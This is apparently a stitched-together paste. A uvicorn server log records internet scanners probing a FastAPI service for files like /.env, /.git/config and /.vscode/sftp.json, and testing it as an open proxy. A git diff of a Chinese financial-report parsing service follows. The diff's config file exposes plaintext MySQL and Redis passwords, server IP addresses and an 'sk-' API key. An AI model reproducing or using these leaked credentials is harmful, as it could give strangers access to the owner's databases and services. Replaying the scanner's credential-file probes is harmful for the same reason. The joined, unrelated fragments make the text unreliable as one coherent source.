    self._process_event(self.our_role, event)
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/h11/_connection.py", line 272, in _process_event
    self._cstate.process_event(role, type(event), server_switch_event)
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/h11/_state.py", line 293, in process_event
    self._fire_event_triggered_transitions(role, _event_type)
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/h11/_state.py", line 311, in _fire_event_triggered_transitions
    raise LocalProtocolError(
 h11._util.LocalProtocolError: can't handle event type Response when role=SERVER and state=MUST_CLOSE
 INFO:     138.197.191.87:39362 - "GET / HTTP/1.1" 404 Not Found
 INFO:     138.197.191.87:49354 - "GET /server HTTP/1.1" 404 Not Found
 INFO:     138.197.191.87:49358 - "GET /version HTTP/1.1" 404 Not Found
 INFO:     138.197.191.87:49374 - "GET /.vscode/sftp.json HTTP/1.1" 404 Not Found
 INFO:     138.197.191.87:49388 - "GET /about HTTP/1.1" 404 Not Found
 INFO:     138.197.191.87:49394 - "GET /debug/default/view?panel=config HTTP/1.1" 404 Not Found
 INFO:     138.197.191.87:49404 - "GET /v2/_catalog HTTP/1.1" 404 Not Found
 INFO:     138.197.191.87:49416 - "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 Not Found
 INFO:     138.197.191.87:49430 - "GET /server-status HTTP/1.1" 404 Not Found
 INFO:     138.197.191.87:49442 - "GET /_all_dbs HTTP/1.1" 404 Not Found
 INFO:     138.197.191.87:49446 - "GET /.DS_Store HTTP/1.1" 404 Not Found
 INFO:     138.197.191.87:36216 - "GET /.env HTTP/1.1" 404 Not Found
 INFO:     138.197.191.87:36226 - "GET /.git/config HTTP/1.1" 404 Not Found
 INFO:     138.197.191.87:36240 - "GET /s/330313e20363e24393e213/_/%3B/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 Not Found
 INFO:     138.197.191.87:36252 - "GET /config.json HTTP/1.1" 404 Not Found
 INFO:     138.197.191.87:36262 - "GET /telescope/requests HTTP/1.1" 404 Not Found
 INFO:     138.197.191.87:36272 - "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     1.92.159.135:44049 - "HEAD /config.json HTTP/1.1" 404 Not Found
 INFO:     1.92.159.135:35640 - "GET /config.json HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     1.94.195.230:31877 - "HEAD /.vscode/sftp.json HTTP/1.1" 404 Not Found
 INFO:     1.94.195.230:18422 - "GET /.vscode/sftp.json HTTP/1.1" 404 Not Found
 INFO:     42.63.124.88:16626 - "GET / HTTP/1.1" 404 Not Found
 INFO:     1.83.125.97:13483 - "GET / HTTP/1.1" 404 Not Found
 INFO:     183.160.194.117:4463 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     45.207.223.44:53774 - "GET / HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:53788 - "GET / HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:53802 - "GET / HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:53812 - "GET / HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:53824 - "GET /login.rsp HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:51720 - "GET /nobody/favicon.ico HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:51724 - "GET / HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:38120 - "GET / HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:38128 - "GET / HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:38138 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:52270 - "GET / HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:52280 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:52286 - "GET / HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:52296 - "GET / HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:37634 - "GET / HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:37636 - "GET / HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:37638 - "GET / HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:53680 - "GET / HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:53686 - "GET / HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:53692 - "GET / HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:53696 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:48892 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:48900 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:48904 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:48914 - "GET /image/lgbg.jpg HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:47014 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:47016 - "GET / HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:47026 - "GET / HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:47034 - "GET / HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:38420 - "GET / HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:56652 - "GET / HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:56662 - "GET / HTTP/1.1" 404 Not Found
 INFO:     45.207.223.44:42704 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     123.249.105.139:30528 - "HEAD /image/lgbg.jpg HTTP/1.1" 404 Not Found
 INFO:     123.249.105.139:62486 - "GET /image/lgbg.jpg HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     124.70.63.89:27278 - "HEAD / HTTP/1.1" 404 Not Found
 INFO:     124.70.63.89:62601 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     1.92.159.135:25603 - "HEAD / HTTP/1.1" 404 Not Found
 INFO:     1.92.159.135:39062 - "GET / HTTP/1.1" 404 Not Found
 INFO:     119.23.241.9:39090 - "GET / HTTP/1.1" 404 Not Found
 INFO:     119.23.241.9:39118 - "GET /lang/CN.txt HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     172.169.4.170:54810 - "GET / HTTP/1.1" 404 Not Found
 INFO:     185.191.126.248:38808 - "GET / HTTP/1.1" 404 Not Found
 INFO:     162.142.125.194:53228 - "GET / HTTP/1.1" 404 Not Found
 INFO:     162.142.125.194:53238 - "PRI %2A HTTP/2.0" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     173.230.135.6:49676 - "GET / HTTP/1.0" 404 Not Found
 INFO:     135.148.63.215:40035 - "GET / HTTP/1.1" 404 Not Found
 INFO:     51.81.181.175:37407 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     64.62.156.89:59349 - "GET / HTTP/1.1" 404 Not Found
 INFO:     64.62.156.88:55637 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     64.62.156.85:58053 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
 INFO:     64.62.156.87:5115 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     87.236.176.226:49403 - "GET / HTTP/1.1" 404 Not Found
 INFO:     185.191.126.248:54802 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     64.62.197.168:52085 - "GET / HTTP/1.1" 404 Not Found
 INFO:     64.62.197.178:24179 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     64.62.197.179:52289 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
 INFO:     64.62.197.169:64257 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     185.216.140.186:60346 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
 INFO:     167.94.138.34:46446 - "GET / HTTP/1.1" 404 Not Found
 INFO:     167.94.138.34:46456 - "PRI %2A HTTP/2.0" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     185.191.126.248:37700 - "GET / HTTP/1.1" 404 Not Found
 INFO:     134.209.10.97:46074 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     223.113.128.164:47694 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     70.39.75.167:49148 - "GET / HTTP/1.1" 404 Not Found
 INFO:     64.62.156.106:20829 - "GET / HTTP/1.1" 404 Not Found
 INFO:     64.62.156.107:28619 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     64.62.156.107:43499 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
 INFO:     64.62.156.97:12331 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
 INFO:     52.80.18.29:48530 - "GET / HTTP/1.1" 404 Not Found
 INFO:     52.80.18.29:48546 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     52.80.18.29:48570 - "GET /sitemap.xml HTTP/1.1" 404 Not Found
 INFO:     52.80.18.29:48554 - "GET /robots.txt HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     124.70.57.132:34056 - "HEAD / HTTP/1.1" 404 Not Found
 INFO:     124.70.57.132:22282 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     39.105.169.144:41754 - "GET / HTTP/1.1" 404 Not Found
 INFO:     39.105.169.144:43626 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     185.191.126.248:59862 - "GET / HTTP/1.1" 404 Not Found
 INFO:     65.49.20.69:33260 - "GET / HTTP/1.1" 404 Not Found
 INFO:     65.49.20.69:48986 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     65.49.20.69:49002 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
 INFO:     65.49.20.69:49010 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
 INFO:     13.64.109.8:36270 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     120.46.90.142:45574 - "HEAD / HTTP/1.1" 404 Not Found
 INFO:     120.46.90.142:23709 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     124.70.25.74:13545 - "HEAD / HTTP/1.1" 404 Not Found
 INFO:     124.70.25.74:28683 - "GET / HTTP/1.1" 404 Not Found
 INFO:     124.70.25.74:28683 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     206.168.34.40:35806 - "GET / HTTP/1.1" 404 Not Found
 INFO:     206.168.34.40:35818 - "PRI %2A HTTP/2.0" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     27.115.124.101:46757 - "GET / HTTP/1.1" 404 Not Found
 INFO:     27.115.124.101:46757 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     185.226.197.63:57255 - "GET / HTTP/1.1" 404 Not Found
 INFO:     185.226.197.63:34425 - "GET /console HTTP/1.1" 404 Not Found
 INFO:     185.226.197.64:37409 - "GET /showLogin.cc HTTP/1.1" 404 Not Found
 INFO:     87.236.176.94:57835 - "GET / HTTP/1.1" 404 Not Found
 INFO:     18.144.4.34:39516 - "GET / HTTP/1.1" 404 Not Found
 INFO:     185.216.140.186:33568 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
 INFO:     106.75.188.200:37598 - "POST /token HTTP/1.1" 404 Not Found
 INFO:     157.245.69.67:34548 - "GET /aaa9 HTTP/1.1" 404 Not Found
 INFO:     157.245.69.67:34552 - "GET /aab8 HTTP/1.1" 404 Not Found
 INFO:     157.245.69.67:42104 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     89.248.172.41:56854 - "HEAD /playlist.m3u HTTP/1.1" 404 Not Found
 INFO:     65.49.20.66:13626 - "GET / HTTP/1.1" 404 Not Found
 INFO:     65.49.20.66:15908 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     65.49.20.66:15922 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
 INFO:     65.49.20.66:15926 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
 INFO:     103.203.58.4:41010 - "GET / HTTP/1.1" 404 Not Found
 INFO:     80.82.77.139:49396 - "GET / HTTP/1.1" 404 Not Found
 INFO:     80.82.77.139:50230 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     185.191.126.248:40242 - "GET / HTTP/1.1" 404 Not Found
 INFO:     70.39.75.159:34126 - "GET / HTTP/1.1" 404 Not Found
 INFO:     185.191.126.248:59652 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     206.168.34.220:36530 - "GET / HTTP/1.1" 404 Not Found
 INFO:     206.168.34.220:36552 - "PRI %2A HTTP/2.0" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     1.94.195.230:25149 - "HEAD / HTTP/1.1" 404 Not Found
 INFO:     1.94.195.230:35249 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     34.140.231.8:38328 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     143.244.133.204:60510 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     36.111.151.242:59402 - "GET / HTTP/1.1" 404 Not Found
 INFO:     36.111.151.242:58560 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     36.111.151.242:58564 - "GET /robots.txt HTTP/1.1" 404 Not Found
 INFO:     36.111.151.242:58578 - "GET /sitemap.xml HTTP/1.1" 404 Not Found
 INFO:     124.70.90.23:39065 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     64.62.156.111:30617 - "GET / HTTP/1.1" 404 Not Found
 INFO:     64.62.156.111:35591 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     64.62.156.118:17357 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
 INFO:     64.62.156.113:56373 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     123.160.223.74:33085 - "GET / HTTP/1.1" 404 Not Found
 INFO:     167.71.11.105:49012 - "GET / HTTP/1.1" 404 Not Found
 INFO:     185.191.126.248:36288 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     167.94.138.163:46744 - "GET / HTTP/1.1" 404 Not Found
 INFO:     167.94.138.163:46748 - "PRI %2A HTTP/2.0" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     18.199.93.83:51354 - "GET /ueditor/net/controller.ashx?action=catchimage&encode=utf-8 HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     172.169.6.55:42302 - "GET / HTTP/1.1" 404 Not Found
 INFO:     184.105.139.69:28842 - "GET / HTTP/1.1" 404 Not Found
 INFO:     184.105.139.69:37052 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     184.105.139.69:37082 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
 INFO:     184.105.139.69:9770 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
 INFO:     208.87.243.131:57870 - "GET http%3A//azenv.net/ HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     124.70.63.89:62210 - "HEAD / HTTP/1.1" 404 Not Found
 INFO:     124.70.63.89:13433 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     87.236.176.32:54413 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     64.62.197.172:16101 - "GET / HTTP/1.1" 404 Not Found
 INFO:     64.62.197.176:47069 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     64.62.197.170:61969 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
 INFO:     64.62.197.167:61305 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
 INFO:     170.64.134.89:39188 - "GET /aaa9 HTTP/1.1" 404 Not Found
 INFO:     170.64.134.89:39204 - "GET /aab8 HTTP/1.1" 404 Not Found
 INFO:     170.64.134.89:39206 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     154.212.141.171:53736 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     118.26.39.17:57178 - "GET / HTTP/1.1" 404 Not Found
 INFO:     118.26.39.17:57214 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     167.94.138.175:45612 - "GET / HTTP/1.1" 404 Not Found
 INFO:     167.94.138.175:45628 - "PRI %2A HTTP/2.0" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     178.32.170.30:38143 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     45.83.65.202:56736 - "GET / HTTP/1.1" 404 Not Found
 INFO:     45.83.66.235:14182 - "GET /favicon.ico HTTP/1.1" 404 Not Found
--- a/zzb_data_word/app_word.py
+++ b/zzb_data_word/app_word.py
@ -3,7 +3,6 @@ from pydantic import BaseModel
 import os
 import utils
 import queue
 import multiprocessing
 from multiprocessing import Process
 import word_title
 import time
@ -85,7 +84,7 @@ def run_job():
                    p = Process(target=main_word.process_table, args=(file_id, job_info,))
                    processes.append(p)
                    p.start()
-                applog.info(f'等待所有子任务完成，任务ID:{file_id}')
+                applog.info(f'等待所有子任务完成，任务ID:{file_id}' )
                for p in processes:
                    p.join()
@ -213,14 +212,14 @@ app.post("/parser/start",
 # 运行 FastAPI 应用
 if __name__ == "__main__":
    # 服务器启动服务
-    # import uvicorn
+    import uvicorn
-    #
+
-    # uvicorn.run(app, host="0.0.0.0", port=config.PORT)
+    uvicorn.run(app, host="0.0.0.0", port=config.PORT)
    # 本地调试任务
-    file_id = "201917"
+    # file_id = "201837"
-    job_queue.put({
+    # job_queue.put({
-     'file_path': '1.docx',
+    #  'file_path': '西部建设.docx',
-     'file_id': file_id,
+    #  'file_id': file_id,
-     })
+    #  })
-    db_service_word.delete_database(file_id)
+    # db_service_word.delete_database(file_id)
-    run_job()
+    # run_job()
--- a/zzb_data_word/config.py
+++ b/zzb_data_word/config.py
@ -1,33 +1,23 @@
-MILVUS_CLIENT='http://124.70.129.232:19530'
+MILVUS_CLIENT='http://127.0.0.1:19530'
-#MILVUS_CLIENT='http://60.204.228.154:19530'
+MILVUS_HOST = '127.0.0.1'
-MYSQL_HOST = '121.37.185.246'
+MILVUS_PORT = 19530
 MYSQL_HOST = '10.127.2.207'
 MYSQL_PORT = 3306
-MYSQL_USER = 'financial' 
+MYSQL_USER = 'financial_prod'
-MYSQL_PASSWORD = 'financial_8000'
+MYSQL_PASSWORD = 'mmTFncqmDal5HLRGY0BV'
-MYSQL_DB = 'financial_report'
+MYSQL_DB = 'financial_report_prod'
-
+NOTIFY_ADDR = 'http://10.127.2.202:8100/api/tenant/report/notify'
-# NOTIFY_ADDR = 'http://192.168.0.175:8100/api/tenant/report/notify'
+FILE_PATH = '/root/pdf_parser/word/'
-
+REDIS_HOST = '10.127.2.209'
 NOTIFY_ADDR = 'http://127.0.0.1:8100/api/tenant/report/notify'
 # REDIS_HOST = '127.0.0.1'
 REDIS_HOST = '123.60.153.169'
 REDIS_PORT = 6379
-REDIS_PASSWORD = 'Xgf_redis'
+REDIS_PASSWORD = 'dMrt4kmwiW6LDJXy'
 FILE_PATH = '/root/word_parser/word/'
 PORT = 8001
 MEASURE_COUNT = 8
 # MYSQL_HOST_APP = '192.168.0.201'#192.168.0.201
 # MYSQL_PORT_APP = 3306
 # MYSQL_USER_APP = 'root'
 # MYSQL_PASSWORD_APP = 'mmTFncqmDal5HLRGY0BV'
 # MYSQL_DB_APP = 'financial_report_prod'
-
+MYSQL_HOST_APP = '10.127.2.207'
 MYSQL_HOST_APP = '121.37.185.246'#192.168.0.201
 MYSQL_PORT_APP = 3306
-MYSQL_USER_APP = 'financial'
+MYSQL_USER_APP = 'financial_prod'
-MYSQL_PASSWORD_APP = 'financial_8000'
+MYSQL_PASSWORD_APP = 'mmTFncqmDal5HLRGY0BV'
-MYSQL_DB_APP = 'financial_report'
+MYSQL_DB_APP = 'financial_report_prod'
 api_key = 'sk-f8413fcfa63a40e49dbb8ac1d0239f6d'
--- a/zzb_data_word/config_init.py
+++ b/zzb_data_word/config_init.py
@ -154,9 +154,9 @@ if __name__ == "__main__":
    )
    cursor = conn.cursor()
-    # measure_config_to_db(conn,cursor)
+    measure_config_to_db(conn,cursor)
-    insert_measure_vector(conn,cursor)
+    # insert_measure_vector(conn,cursor)
    # cursor.close()
    # conn.close()
--- a/zzb_data_word/db_service_word.py
+++ b/zzb_data_word/db_service_word.py
@ -209,6 +209,17 @@ def update_ori_measure(conn,cursor,file_id):
                and t2.year = '{year}'
                '''.format(file_id=file_id, year=report_year)
    select_query_first_quarter = '''
                SELECT t2.measure_id,t2.measure_name,t1.ori_measure_id
                FROM ori_measure_list t1
                left join
                measure_config_first_quarter t2
                on t1.ori_measure_id = t2.ori_measure_id
                where t2.measure_id is not null and (t1.measure_id is null or t1.measure_id ='')
                and t1.file_id = '{file_id}'
                and t2.year = '{year}'
                '''.format(file_id=file_id, year=report_year)
    if report_type == 1:
        start_time = time.time()
        cursor.execute(select_query_half_year)
@ -216,6 +227,13 @@ def update_ori_measure(conn,cursor,file_id):
        end_time = time.time()
        applog.info(f"更新数据查询 {(end_time - start_time):.2f} 秒。")
        applog.info(f'update_ori_measure方法走的是半年报')
    elif report_type == 2:
        start_time = time.time()
        cursor.execute(select_query_first_quarter)
        records = cursor.fetchall()
        end_time = time.time()
        applog.info(f"更新数据查询 {(end_time - start_time):.2f} 秒。")
        applog.info(f'update_ori_measure方法走的是一季报')
    elif report_type == 3:
        start_time = time.time()
        cursor.execute(select_query_thrid)
@ -243,6 +261,9 @@ def update_ori_measure(conn,cursor,file_id):
    if report_type == 0:
        table_name = "measure_config"
    elif report_type == 2:
        table_name = "measure_config_first_quarter"
    elif report_type == 3:
        table_name = "measure_config_third_quarter"
    else:
@ -342,7 +363,14 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
    measure_index_records = cursor_app.fetchall()
    for measure_index_record in measure_index_records:
        measure_index_array.append(measure_index_record[0])
    if str(report_type) == "2":
        table_index_array = []
        measure_index_array = []
    applog.info(f'黑名单的值是{parent_table_pages}和{table_index_array}以及新增的{measure_index_array}')
    applog.info(f"black_array:{black_array}")
    record_start = record_range.split('-')[0]
    record_end = record_range.split('-')[1]
@ -369,6 +397,8 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
                filter=filter_str
            )
            # Convert the output to a formatted JSON string
            # for i in range(len(res[0])):
            for i in range(len(res[0])):
@ -392,11 +422,13 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
                #过滤指标中包含黑名单关键词
                if utils.check_pdf_measure_black_list(pdf_measure):
                    continue
                if f"{table_num}" in measure_index_array and utils.check_pdf_measure_black_list_v3(file_id,table_num,table_index,pdf_measure,conn_app,cursor_app):
                    #if utils.check_pdf_measure_black_list_v3(file_id,table_num,table_index,pdf_measure,conn_app,cursor_app):
                    applog.info(f'经过第三层规则去除了{table_num}页的{pdf_measure}指标')
                    continue
                if vector_distance > distance and table_num not in parent_table_pages:
                    #检测规则开始
                    #判断抽取指标和财报指标周期是否相同
@ -407,6 +439,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
                    if(ori_period != pdf_period):
                        continue
                    #判断抽取指标和财报指标是否期初指标
                    start_ori_period = utils.get_start_period_type(ori_measure_name)
                    start_pdf_period = utils.get_start_period_type(pdf_measure)
@ -423,12 +456,14 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
                    if(ori_season_type != pdf_season_type):
                        continue
                    #判断是否都是扣非指标
                    ori_kf_type = utils.get_kf_flag(ori_measure_name)
                    pdf_kf_type = utils.get_kf_flag(pdf_measure)
                    if pdf_measure == '2023年6月30日货币资金合计':
                        applog.info(f'第4处{ori_kf_type}和{pdf_kf_type}')
                    if(ori_kf_type != pdf_kf_type):
                        applog.info(f'扣非指标{table_num}页的{pdf_measure}指标')
                        continue
                    #判断抽取指标和财报指标类型是否相同，是否都是百分比
@ -465,6 +500,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
                        continue
                    if(utils.check_white_list(measure_name,pdf_measure)):
                        applog.info(f"measure_name{measure_name},pdf_measure{pdf_measure}")
                        continue
                    #判断抽取指标和财报指标类型是否都是增长类，比如同比变动为增长类
@ -508,6 +544,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
        conn.close()
        client.close()
 # 
 def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,file_id,file_name):
    select_year_select = f"""select report_type,year from report_check where id = {file_id}"""
    cursor.execute(select_year_select)
@ -527,10 +564,16 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
                SELECT ori_measure_name,measure_name,distance,ori_measure_id,measure_id FROM measure_config_third_quarter
                where year = '{year}'
                '''.format(year=report_year)
    select_query_first_quarter = '''
                SELECT ori_measure_name,measure_name,distance,ori_measure_id,measure_id FROM measure_config_first_quarter
                where year = '{year}'
                '''.format(year=report_year)
    # select_black_array_query = 'SELECT measure_name, keywords FROM measure_black_list where isdel = 0'
    select_black_array_query = '''
                SELECT measure_name, keywords FROM measure_black_list where isdel = 0 and  find_in_set('{year}',year) and find_in_set('{flag}',flag)
                '''.format(year=report_year, flag=report_type)
    black_array = []
    cursor.execute(select_black_array_query)
    results = cursor.fetchall()
@ -553,6 +596,20 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
            p = Process(target=insert_table_from_vector_mul_process, args=(parent_table_pages,file_id,file_name,records,record_range,black_array,))
            processes.append(p)
            p.start()
    elif report_type == 2:
        start_time = time.time()
        cursor.execute(select_query_first_quarter)
        records = cursor.fetchall()
        end_time = time.time()
        applog.info(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。")
        applog.info('insert_table_measure_from_vector_async_process方法走的一季报')
        start_time = time.time()
        records_range_parts = utils.get_range(len(records),MEASURE_COUNT)
        processes = []
        for record_range in records_range_parts:
            p = Process(target=insert_table_from_vector_mul_process, args=(parent_table_pages,file_id,file_name,records,record_range,black_array,))
            processes.append(p)
            p.start()
    elif report_type == 3:
        start_time = time.time()
        cursor.execute(select_query_thrid)
@ -698,11 +755,15 @@ def insert_measure_data_to_milvus(client,table_info,cursor,conn):
            measure_list = table['measure_list']
            for measure in measure_list:
                measure_name = measure['measure_name']
                # 需要跳过的一些指标
                black_list = ["营业总成本"]
                if any(black in measure_name for black in black_list):
                    continue
                measure_value = measure['measure_value'].replace("(", "").replace(")", "")
                measure_name = utils.get_clean_text(measure_name)
-                measure_name = measure_name.replace('2024','2024年').replace('2023','2023年').replace('2022','2022年').replace('（','').replace('）','')#这个真绝了，怎么都删不掉
+                measure_name = measure_name.replace('2023','2023年').replace('2022','2022年').replace('（','').replace('）','')#这个真绝了，怎么都删不掉
                #measure_name_1 = measure_name.replace('调整后','')
-                quarters = ['第一季度', '第二季度', '第三季度', '第四季度','增减','2024年','2023年','2022年','2021年','年']
+                quarters = ['第一季度', '第二季度', '第三季度', '第四季度','增减','2023年','2022年','2021年','年']
                for quarter in quarters:
                    measure_name = measure_name.replace(quarter * 2, quarter)
                pattern_dup = re.compile(r'(\w{3,})\1+')#去掉任意超过两个字且重复的字符
@ -712,7 +773,6 @@ def insert_measure_data_to_milvus(client,table_info,cursor,conn):
                measure_name = pattern_dup.sub(r'\1', measure_name)
                measure_name_1 = measure_name.replace('调整后','').replace('上年期末数','上年期末').replace('上年期末','上年年末')
                measure_unit = measure['measure_unit']
